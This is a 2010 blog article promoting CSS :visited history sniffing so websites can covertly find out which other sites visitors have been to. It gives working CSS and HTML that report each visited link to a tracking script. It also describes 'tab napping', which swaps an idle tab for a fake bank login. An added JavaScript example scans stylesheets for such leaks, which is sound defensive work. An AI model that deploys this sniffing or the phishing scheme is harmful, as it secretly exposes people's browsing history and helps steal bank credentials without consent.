05 December 2010
Recently browser sniffing has been massively publicised, and there have been some pretty big names doing it - so what exactly are you missing out on? Imagine a marketing company being able to tailor each advert according to which sites its visitors had visited. That sounds too good to be true, right? Wrong! With browser sniffing you can check whether any given website has been visited - and it isn't difficult either.
What this means is that you can customise parts of your site around which websites your visitors have visited. For example, if you are selling software products you could check whether your visitor has been to Microsoft.com, and if they have you could show all of the Microsoft products - the possibilities are endless.
So the big question is how? How do browsers allow you to do this? Basically it's a fundamental flaw in how browsers work, and it surrounds CSS (Cascading Style Sheets). When you click a link the browser saves a state for it, and this state is called "visited". Whenever that link then appears on another website, the browser still reports it as visited, which means that if you have a number of URLs you can tell which ones the visitor has and hasn't been to.
Browser sniffing has been reported to all of the major browsers - however there are billions of sites using CSS, so a change would be difficult to implement - and a change which required people to change their websites would be out of the question.
One way to get around this would be to keep the states locally, meaning that each state is saved on a per-site basis. This would require a massive change by all of the browsers, and it doesn't seem to be something they are particularly bothered about.
So, how do I do it? Please see the code below.
CSS Style sheet
/* The class sits on the link itself, so the selector is a.Class:visited */
a.Google:visited {background-image:url('http://www.lexel.co.uk/tracking_script.asp?Ref=Google.com');}
a.Facebook:visited {background-image:url('http://www.lexel.co.uk/tracking_script.asp?Ref=Facebook.com');}
HTML
<a href="http://www.google.com" class="Google">Google</a>
<a href="http://www.facebook.com" class="Facebook">Facebook</a>
Once you've called your tracking script you could then set a cookie or session.
There is another quite popular technique called Tab Napping. The idea of Tab Napping is that when you leave your computer for a period of time a script activates - this script then redirects you to a website you have recently visited (using the history sniffing technique) and asks you to enter credentials. The idea is that it redirects you when you've left to make that quick cup of tea! Once you come back you're faced with a page identical to Halifax or Santander - of course, you would just assume that you'd left it open and log in as normal.
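A defender-side check for the pattern shown above, as an added example that is not part of the original article: it scans stylesheet text (for instance from a third-party advert or widget) for `:visited` rules that trigger a network load or set anything beyond colour. The sample stylesheet and the `tracker.example` host are constructed, and the allow-list reflects the colour-only properties that current browsers still apply to visited links.

```javascript
// Colour-only properties that current browsers still apply inside :visited rules.
const VISITED_SAFE = new Set([
  'color', 'background-color', 'border-color', 'border-top-color', 'border-right-color',
  'border-bottom-color', 'border-left-color', 'outline-color', 'column-rule-color',
  'text-decoration-color', 'text-emphasis-color', 'fill', 'stroke',
]);

// Split CSS text into {selector, declarations} for each innermost rule block.
function parseRules(css) {
  const rules = [];
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ''); // drop comments
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    const declarations = m[2].split(/;(?![^()]*\))/) // a ';' inside url(...) does not split
      .map((d) => d.trim())
      .filter((d) => d.includes(':'))
      .map((d) => {
        const i = d.indexOf(':');
        return { prop: d.slice(0, i).trim().toLowerCase(), value: d.slice(i + 1).trim() };
      });
    rules.push({ selector: m[1].trim(), declarations });
  }
  return rules;
}

// Report declarations in :visited rules that trigger a network load (url(...))
// or set a property outside the colour-only allow-list.
function findVisitedLeaks(css) {
  const findings = [];
  for (const { selector, declarations } of parseRules(css)) {
    if (!/:visited\b/i.test(selector)) continue;
    for (const { prop, value } of declarations) {
      const url = /url\(\s*['"]?([^'")]+)['"]?\s*\)/i.exec(value);
      if (url) findings.push({ selector, prop, kind: 'network-load', target: url[1] });
      else if (!VISITED_SAFE.has(prop)) findings.push({ selector, prop, kind: 'non-colour', target: null });
    }
  }
  return findings;
}

// Constructed sample stylesheet; tracker.example is a placeholder host.
const SAMPLE_CSS = `
a.partner:visited { background-image: url('http://tracker.example/hit?ref=partner'); }
a:visited { color: purple; }
@media screen { a.shop:visited { display: none; } }
a.docs:hover { background-image: url('hover.png'); }
`;
console.log(findVisitedLeaks(SAMPLE_CSS));
```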
You've scared me, how do I protect myself? I would suggest using something like Trusteer Rapport; this will alert you if you enter protected details into another website. Before logging into any secure website, make sure you have the padlock symbol.
You can download Rapport from here: http://www.trusteer.com/product/trusteer-rapport
Article Written by Jason Gaved